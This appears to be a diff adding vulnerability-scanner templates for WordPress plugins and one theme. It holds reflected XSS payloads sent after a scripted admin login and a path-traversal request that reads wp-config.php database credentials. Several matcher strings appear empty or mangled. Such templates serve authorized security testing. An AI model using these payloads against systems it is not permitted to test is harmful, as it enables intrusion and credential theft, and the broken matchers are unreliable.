diff --git a/cves/2021/CVE-2021-25063.yaml b/cves/2021/CVE-2021-25063.yaml
new file mode 100644
index 0000000000..781d1e51a4
--- /dev/null
+++ b/cves/2021/CVE-2021-25063.yaml
@@ -0,0 +1,45 @@
+id: CVE-2021-25063
+
+info:
+ name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting
+ reference: https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2021-25063
+ cwe-id: CWE-79
+ tags: wordpress,wp-plugin,xss,contactform,wp,cve,cve2021
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "![]()
' type='hidden"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2022/CVE-2022-0149.yaml b/cves/2022/CVE-2022-0149.yaml
new file mode 100644
index 0000000000..bcc9b09665
--- /dev/null
+++ b/cves/2022/CVE-2022-0149.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-0149
+
+info:
+ name: WooCommerce – Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
+ reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2022-0149
+ cwe-id: CWE-79
+ tags: wordpress,wp-plugin,xss,woocommerce,cve,cve2022
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/accessibility-helper-xss.yaml b/vulnerabilities/wordpress/accessibility-helper-xss.yaml
new file mode 100644
index 0000000000..328e8951e4
--- /dev/null
+++ b/vulnerabilities/wordpress/accessibility-helper-xss.yaml
@@ -0,0 +1,30 @@
+id: accessibility-helper-xss
+
+info:
+ name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDK
+ severity: medium
+ description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue.
+ reference: https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5
+ tags: xss,wordpress,wp-plugin,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "var wah_target_src = '';alert(document.domain);//';"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/easy-social-feed.yaml b/vulnerabilities/wordpress/easy-social-feed.yaml
new file mode 100644
index 0000000000..d92351aa95
--- /dev/null
+++ b/vulnerabilities/wordpress/easy-social-feed.yaml
@@ -0,0 +1,40 @@
+id: easy-social-feed
+
+info:
+ name: Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise and escape a parameter before outputting back in an admin dashboard page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged admin or editor.
+ reference: https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
+ tags: wordpress,wp-plugin,xss,wp
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'type' : ''"
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/elex-woocommerce-xss.yaml b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
new file mode 100644
index 0000000000..4eaef6e57e
--- /dev/null
+++ b/vulnerabilities/wordpress/elex-woocommerce-xss.yaml
@@ -0,0 +1,40 @@
+id: elex-woocommerce-xss
+
+info:
+ name: ELEX WooCommerce Google Shopping < 1.2.4 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise or escape the search GET parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue, which will be executed in a logged in admin context.
+ reference: https://wpscan.com/vulnerability/647448d6-32c0-4b38-a40a-3b54c55f4e2e
+ tags: wordpress,wp-plugin,xss,wp,woocommerce
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/feedwordpress-xss.yaml b/vulnerabilities/wordpress/feedwordpress-xss.yaml
new file mode 100644
index 0000000000..7e698cf3ac
--- /dev/null
+++ b/vulnerabilities/wordpress/feedwordpress-xss.yaml
@@ -0,0 +1,40 @@
+id: feedwordpress-xss
+
+info:
+ name: FeedWordPress < 2022.0123 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin is affected by a Reflected Cross-Site Scripting (XSS) within the "visibility" parameter.
+ reference: https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571
+ tags: wordpress,wp-plugin,xss,feedwordpress,wp
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">
" method="post">'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/mthemeunus-lfi.yaml b/vulnerabilities/wordpress/mthemeunus-lfi.yaml
new file mode 100644
index 0000000000..bb1b5770e5
--- /dev/null
+++ b/vulnerabilities/wordpress/mthemeunus-lfi.yaml
@@ -0,0 +1,29 @@
+id: mthemeunus-lfi
+
+info:
+ name: mTheme-Unus Theme - Local File Inclusion (LFI)
+ author: dhiyaneshDk
+ severity: high
+ description: The mTheme-Unus WordPress Theme was affected by a css.php Local File Inclusion security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/bc036ee3-9648-49db-ae52-3a58fdeb82eb
+ - https://packetstormsecurity.com/files/133778/
+ tags: wordpress,wp-theme,lfi,wordpress,mtheme
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/my-chatbot-xss.yaml b/vulnerabilities/wordpress/my-chatbot-xss.yaml
new file mode 100644
index 0000000000..0b16c2e11c
--- /dev/null
+++ b/vulnerabilities/wordpress/my-chatbot-xss.yaml
@@ -0,0 +1,40 @@
+id: my-chatbot-xss
+
+info:
+ name: My Chatbot <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise or escape its tab parameter in the Settings page before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue.
+ reference: https://wpscan.com/vulnerability/c0b6f63b-95d1-4782-9554-975d6d7bbd3d
+ tags: wordpress,wp-plugin,xss,wp
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/vulnerabilities/wordpress/wp-whmcs-xss.yaml b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
new file mode 100644
index 0000000000..6bbc31e45d
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-whmcs-xss.yaml
@@ -0,0 +1,41 @@
+id: wp-whmcs-xss
+
+info:
+ name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
+ author: dhiyaneshDk
+ severity: medium
+ description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
+ reference: https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
+ tags: wordpress,wp-plugin,wp,whmcs,xss
+
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "![]()
"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200